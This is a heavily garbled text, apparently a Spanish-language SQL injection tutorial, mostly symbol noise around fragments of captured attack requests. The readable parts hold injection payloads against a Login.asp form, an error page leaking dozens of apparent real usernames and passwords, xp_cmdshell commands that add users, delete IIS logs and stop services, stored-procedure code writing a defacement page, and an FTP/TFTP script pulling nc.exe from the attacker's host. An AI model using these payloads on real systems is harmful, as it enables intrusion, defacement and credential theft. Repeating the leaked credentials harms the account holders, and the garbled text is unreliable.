argument.xxxxxxxxxx. line 85 ) " " & 9 " " I8 .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. Windows NT 5. " .asp. /Login. application/x-shockwave-flash. " " 6 " " 6 " 4 < + 7 " + " " * 9 POST /Login. image/pjpeg.C 5 9 ( " "4 .asp?validar=2 HTTP/1.F& & & * " "00 6 ( "& . image/x-xbitmap. image/jpeg.com/Login. MSIE 6.

" . ) " &" * "& " " )4 6 " " " " #$% 1 :1& 9 " " " ( & . E1 ) " " # " !G# E' " D F " + " " " < " ! & " > > .2 " " 6 " #$% ) " #$%KK& " 8 " "& "& " " " " ) # " " ) " " ) " E! " " " " + ) " "9 ".5 * " )4 6 & b 1. " "" "& " . 4 6 " 6 & .> 8" * IIF " ! :M& 4 * * " ( " ) "& . F 9 " " 9 " . * & )" 6 1 &( ! # 5 :# 6 6 " D " " 6 . " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " ' ( " ." .5 ) +8 > . " . " " . ) 6 " " EA 7 4 " + >5 6 6 " " 1H5 ' 5 " >9 4 > # " 6" 4 # # " " " # )!% #. - " " " 4 " F " " . & " & 9 F .5.8 .: 9 " " 9 " #$% " " (! * " 9 9 " < =" ># > & #$% " " " " 4 " 9 " < " & 6 7 " " " " " " " " " 8 " I #$% " + " " 9 1H5 ' 5 " " ) " " " ! <1 " " ! M " " %"# " " " . " " " . " " + " F " " > . " & "" . > " E! . . M " .:. " " ) "& + " " * >86 "& " "" " 4 E% " 9 9 " + . !: . #$% ! .J & " " "& " " ) " " ) " ) " " 6" " > >& 9 . &9 " < ' " 5 + ` a>& #$% & 6 " " " " 4 " 9 " " " " 4 " * > .

xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y .0) Host: www.2 4. "& .xxxxxxxxxx. image/pjpeg. image/jpeg. 8 .asp?validar=2 HTTP/1.xxxxxxxxxx.com/Login.= .: 9 " . . ! 6 ( " " " )4 * " 6 & #! ! .application/x-shockwave-flash. & " "9 " " A=4 " 9 * 4 . ! " ) " E% 9 " 6 " " " * "6 " 6 " " & " ( * 1. */* Referer: http://www. " " "" ( 7 " " " ! > $6 3 / % #$% " * H 6 . " Y . MSIE 6. > * ) ) . Windows NT 5. " 6" ( F * " " . !< #$%& !& (! ( " * ( . deflate User-Agent: Mozilla/4. " " " " " ) " ) 6 " * & " (! 6#. image/x-xbitmap. " >) 6 " ) " " 7 " 9 " ) " = # (! .1 Accept: image/gif.0 (compatible. + !G# F+6 " * 9 ) = + POST /Login.0." " 6 !:#.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.

0001/13119695.xxxxxxxxxx.0 (compatible.susy/susyk a.asp?validar=2 HTTP/1.SANDRA/4484188. MSIE 6.2 H + <V W < L [L L[ <[ -> $6 3 . ! EB " " F" <VLL " U <" < " (! 6#.-' 6 6 .0) Host: www.com/Login.CIELORIANO/daniel. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-&txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . Windows NT 5.maria_perez/12345.AngelicaS/chainy. " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe.ALELARRAINP/14 05. 6 ( " #8%8'.) " . image/x-xbitmap. image/pjpeg.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.application/x-shockwave-flash.Mireya_Salazar/gabriela. */* Referer: http://www.AsdrubalCh/1173. deflate User-Agent: Mozilla/4. image/jpeg. " 4 * <& & & * * < 00 & " " 6 * :.1 Accept: image/gif.batv/peresosita. ! " & " ) ) " ( " < + 7 " POST /Login.MVidales/male. 8 <6 "[L]L* .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.0.beatrizay ala/10338154.THEMA/M1703. " Y H + ) " ( " * "L " ) " !:#.xxxxxxxxxx. .

.5.xxxxxxxxxx.1 Accept: image/gif. Y H + L] ) < 00 .victor. " $+6 4 H " "" !.mguevara/martha.Tiatere1/lima27. */* Referer: http://www. Windows NT 5. deflate User-Agent: Mozilla/4.0.xxxxxxxxxx. image/pjpeg. " 5 " " "9 ) " " " * & " " " """ "& * & " " " .dayana/ne ne.. image/jpeg. ) "9 &" " . " "" 6= !:#.asp?validar=2 HTTP/1. + POST /Login.0 (compatible.asp.. /Login. + ( " . 6 6 " . " ! " " 6 " " "& 9 "" " " ") . ! ") " & "& " ) " .6! .MonicaA/amorcito.8 4 9 " " " . line 85 2> $6 3 4! & ! 6 ( ) ( .com/Login. :!& " " " " (! 6#.application/x-shockwave-flash.aliciafalcon/baby. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.22 carla/cardie. image/x-xbitmap.CMorena/2 11095.Luz_d/carmen. MSIE 6.0) Host: www." " " " ( " . 4 ".

1 Accept: image/gif. = " ( "& + "9 9 6 " " ) " 7 . MSIE 6.xxxxxxxxxx.& ) & " " 9 + " " " & KKKF 9 "& " " " " " " 6 .com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. " " & " " ) " "" ") " ( " E' " & ( ! .asp?validar=2 HTTP/1. */* Referer: http://www.com/Login. image/pjpeg.application/x-shockwave-flash. + 9 " * " E5 9 . " Y H + L " "" "VL1 6 ! ""L VL' L00 +4 4 4 # & . deflate User-Agent: Mozilla/4. " * 'delete from usuarios where UID='Usuario'-- + 1 4 $ " 4 " " " & 4 1#8 .0 (compatible. Windows NT 5." 9 " H " #$% # 6 F !:#. 9 = 6 " 9 " " . " & . & + " 4 .23 POST /Login.0. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . image/x-xbitmap.0) Host: www.xxxxxxxxxx. " . image/jpeg.

" & " 9 = ( " . image/pjpeg. * " 4 " " + & " + & 6 " " POST /Login. Windows NT 5. image/jpeg. " " "+" " " 1#8 . " * #$% # 6 "> " " $ % " ) " II .asp?validar=2 HTTP/1.1 Accept: image/gif. # " " " 6 " ?4.com/Login. deflate User-Agent: Mozilla/4. < $ " " " " 8< " " #0#$%& " ") " 5 . image/x-xbitmap.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.2? 5"= " ". xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . MSIE 6.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.0) Host: www.0 (compatible.0. " ) " 9 <" " " " " ) " & 9 " " " !:#. ! . 6= :)6 7< * 9 " + . .xxxxxxxxxx. " 7 " " ) " 6" " & < "" " " " * 6 "* " >8< " #$% 1: "9 # ! 4 * " " " * " " ! ) ( " & " . */* Referer: http://www.%%L" 9 " & * #0#$% ) < " " ") " " " " < "& . " Y H + L] " " "6 " EL + " L&L +! "" LF00 % & " ( & ! .xxxxxxxxxx. " "& # " & . application/x-shockwave-flash.

" Y H + "L]8N8' " ) < Q " L < L00 :M 9 E . & " "1 & 9 #5 F " " 9 " " & F " " . image/jpeg.xp_cmdshell%27cmd. " * " " "* E/ & .exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " POST /Login.com/Login.application/x-shockwave-flash. 4 " ) 4 " = ) &6 6 " " = " 4 & " " " )" 6 " * "6 "6 " E8 " " " "F + < Q ) ) 4 ") " > > " " < Q ( " .xxxxxxxxxx. Windows NT 5.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA. deflate User-Agent: Mozilla/4. MSIE 6.asp?validar=2 HTTP/1.0) Host: www. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.2@ " " & " 5 " < " "& " ) * ) " * " " " N Q " > "> 4 " " "& " "" " " < Q " " K6 " . ) " " " 6 = ) " * " " * 5 " " ) .0 (compatible.! ) " " " " " 4 " " "9 " ( = " " "" " " 9 " " + " " " ( 6 6= #$% " ". image/x-xbitmap. */* Referer: http://www.0.xxxxxxxxxx.1 Accept: image/gif.. image/pjpeg.dbo.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.

.xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..exe' ! ) " EXEC master.xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master.xp_cmdshell 'type c:\inetpub\wwwroot\alguna_pagina.xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master.log' EXEC master. " " ) 6 &" * & .xp_cmdshell 'NET USER username password' :M& " ) . MyPass 9 .. " ) & " " " "> + >8< # ! "> 9 ) = " " ! " " " " " & #0#$% # 6 " * " "+" " " 6 "* " " " ) " 9 " " ># " " ) " "* " + " " .2 ! " EXEC master.asp' ! " ) EXEC master. ">& " " " " # " >8< # " )7 ) " + ! ">& " " " " & >1 4 " " 'exec master.xp_cmdshell 'DIR c:\winnt\system32\logfiles\w3svc1\' EXEC master.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc1\ filelog. " 8< " " " ... ..exe c:\inetpub\wwwroot\chroot. " " ! " = " ...sp_addlogin MyUser.xp_cmdshell 'copy c:\winnt\system32\cmd...xp_cmdshell 'dir c:\inetpub\wwwroot\' ! 6 9 6 EXEC master.

'writeline'. '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil. " + " . "* . Q ) "M Q .. '<!--" "-></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f. . &9 4 . 1 exec @ret=sp_oamethod @f. @ret int exec sp_oacreate 'scripting. Q .. NULL.</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f.] La idea es crear una pagina html o asp. " > . 'c:\web-hosting\attajdid\index3. @o out exec sp_oamethod @o. " " " ( " " " ) 4 " " + #$% 9 4 > "& 9 " " ( 67" < #$% E$ + " #$% 6= #5& " ) * " #$%& ) " "" ) " & ".$ %+ ) % " " " 4 & ) * ( ) Q ..] declare @o int. NULL. " 1 & M <& 6 Q . 6 Q" 6 Q " Q Q 6 . NULL. @f out. Q "6 + ) .-'F& " " " 322& 9 " # ) 7 9 9 < < < < < & " " " " " "+ 7 ' 4 " & " " " H " " . '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f..filesystemobject'.. 'writeline'. si en el sitio objetivo se encuentra activo y funciónando un webserver [. " >& 7 " " ----.html'. * + . 'createtextfile'. " . @f int. 'writeline'. NULL..Extracto -----------------------------------------[. 'writeline'. (( # < " " " . @t int.2B " " " " " Q Q Q " Q *. Q . 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>' . M + & * " " * + " % " < < < < > * " +( 9 :.

'writeline'. 'writeline'. '<TBODY> <TR> <TD bgColor=#d20000>&nbsp. 'writeline'. 'writeline'. 'guest' EXECUTE @ret=sp_oamethod @f. 'writeline'. 'c:\get. 'writeline'. NULL. 'createtextfile'. NULL. 'writeline'. NULL.. 'writeline'. NULL. NULL.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master. 'bgColor=#d20000>&nbsp . '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f. '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f. 'writeline'. 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos. @f out.</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f. @t int.2C exec @ret=sp_oamethod @f. 'writeline'. 1 EXECUTE @ret=sp_oamethod @f. 'guest' EXECUTE @ret=sp_oamethod @f. '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f. NULL. 'writeline'.</TD></TR><!--" "-></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f.txt'.xp_cmdshell 'FTP -s c:\get. 'quit' EXECUTE master. 'get nc. NULL. 'guest' EXECUTE @ret=sp_oamethod @f. NULL. '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f. NULL.Creamos un archivo get.txt para utilizar luego ftp declare @o int.filesystemobject'. '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f. @f int. '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f. NULL. 'user anonymous' EXECUTE @ret=sp_oamethod @f. NULL.xp_cmdshell 'TFTP -i NUESTROHOST GET c:\mi_local_file c:\remote_file' . @o out EXECUTE sp_oamethod @o. 'writeline'. NULL. NULL. 'writeline'. @ret int EXECUTE sp_oacreate 'scripting. NULL. NULL. 'writeline'. 'writeline'.exe' EXECUTE @ret=sp_oamethod @f.

a = " " J "" " + .3 ----.J #$% 4 ) 4 " ! " ` : . E .! . & ) " " " " ( " * " 6" " #0#$% # 6 & ") " . &c " & M : . " Q )4 `& 6 `&` ` aa M & : . ") " " 0 . < a )4 `& . a Va " 3 # ) " " ) " 9 7 9 & "IF * ) 5 * + " 7" 6 " " &9 "& " 6" " " " .: : .! .! . * "+" )4 F + " 7 " )4 6 " ) " " . " D " ) + = " & J " " " ) ) " " * " " >. " 9 " 8 " 4 " . "" " " ) " " & " + " . " "9 9 " . " " G )5 " " " L 1.Extracto -----------------------------------------:M& ) )4 " 6 " *=" " " " " # 6 " .A %8L > > + = " "+ ) & + #$% 9 6 ) <" 6 " ( " E: ) = " * " " " #$% + " ) # " " +! 4 > " " #$% 4 * # ' % #0#$% ) . &" 7 " " : . " " &" " Q +" Q 9 " " )4 :%8 " " * #$% " . " Q .

'! 322 + . . * % " " " * " 6 " ) " " " " ". # ':!S E8 " # )" " ") " 1 :1 " ) ! "5 J "" "" " " ) "K 0 # )" " ") " 1 :1 " ) ! "5 " J "" "" " ) "K " " "" " E< Q " &" Q " F "@ % " * & A . * 7 " ' " " . " 6 " .! 323F 1 " " 6 " ) " " 6 1 " " = & " " " " ! M "" "" 6 " A " 6= " " ) " = " 8" " 6 #$% " 6 . " 6 7 .3 03 ! # )" " ") " 1 :1 " ) H " 1 " J " "" 0 +. " & 9 " & " 4 " & "& " 7 . ( #0#$% " " " " " " " " ( " ( & ") 6 " ) ) # 6 " " 6 " " "9 " J " " 6 " ) " " "9 ! 4 *=" " "" 6 8" ) ( ! = ' ( # * * " " < + " .# )" " ") " 1 :1 " ) ! "5 1 " J " E *Q* KF " " "" " " F 0$ . " .

"& " "A = & *. " "" " 9 " ) " + = " 7< " + " " 8 " G " "" "+ " " " " 6 " E. " . * . 6" " " . F H *9 6 " " " " " #0#$% # 6 8" ) ( " 6 . & " " " * " . " " " . 6 ) " ) " " " " " . " " 9 " " " " 7 " " " "& 6 " " "& . 6 ( " " " " ' " 6 " .8 5 G " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ( M" ". G " " " " " ." 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " ." ) #0#$% # 6 " " 6 & <" "9 " " + "* " " +# 6 "! " ) " "& 6 " " . ) " " "A % B #0#$% # 6 " 6 " " 6 " . ( # #. & 9 . 9 " " * " & +" ") " 7 " + " " * " " " ") " " " ) + +" ( " " " ) 4 " 6 " " " .= " ) " ) " *= 4 & 74 . " & " & " * " " #0#$%F 8" . ( & M" ) *. " "" * " * & " ) "" 6 > . 6 " * " * E " " " . * ) . 6 8 ! " " .3 ! " " " . " . > + " " " ) = 6 " #$% 4 # ) * " " * M . * " "* "& " " ) = " . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . E. " 6 " ) " "" " . " ) " . " D " ". " & " " + " "" ") " & ") < M .

) " " #0 #& #0#$%& # " " 8 !& " " ) ( " * & " . "" "6 .' " M M M " #9 )* ( +9 " " 5 & > * . ! "C ) " + " 6 " " " " > " * 7 " + % " 9 " # M .Q#$%Q# 6 Q " .M > " " "* 4 " ) & "> < 6 6 . 6" " " " "& + 5 " >5 . 8< " M .! 1 ! @8 " .Q ) " Q" + * " " + 6 " ?. "" " M .8 " " 6 5 " " " 9 # " 9 + " " " " " 6 " .: " * " ( " " " " * & " " 9 ". 6 " # .32 ' 6 G " 2& + " " ") "9 " " " " ) " " " . "" " 0#$% * < . &+ 9 #:. & 8A#& F "= )7 %81. " Q6 "9 " " "D ! M " M " M " " < + + * . "" " Q 6 Q"9 Q 4 * < . E5 ( " 5 "& .Q#$%Q 4 * < .0"9 0 "" " * < . "9 " 7 " #$% " ' " < % & ! & G " > E #-1 B303B 022CB0@F M " Q QG " "9 "9 Q 3 + " * "9 6 6 " + " + " " #$% 4 G ! * " " " . "" " 6 Q"9 Q 4 * < .

6. "J . II )+ 5 . )5 "0 0 @0) ( " "* " " " M + "B 01 0 0' 0S " " . " " / " " 6 " * " * . & " 6 = " . " = &+9 . " <" " " " " . ' % . " " " 5 " >5 .33 M M M M " " " " << " " " " " " + . ! = #0#$%& "9 + 67" " +# * " " . 1 " ( + . G "9 . " " #$% 4 % d " " " * > 9 " & # 9 . & . " " / ! 9 " # & . > > < 1 ) " ) " " " + 9 " ") 6 9 9 " " " " "6 " "* ( " " ") ( " 9 " " " ( & 9 " * "9 " "& " < ") " "" " " " " " " " )7 . " " E8" " " " " . 8 " * * " * " )+ 1 F )+ " 59 = . " " #9 M ( + . 6 " " " " " " " . D . "KF " " 9 D " +* O1 < . " & = " " MQJ % ! ( ( ** = " . :! "9 " . " " .( + + . (( # + . G "9 < + . " " " * " ) ") "I )+ 5 . 1. " ) 9 " " .

Sign up to vote on this title
UsefulNot useful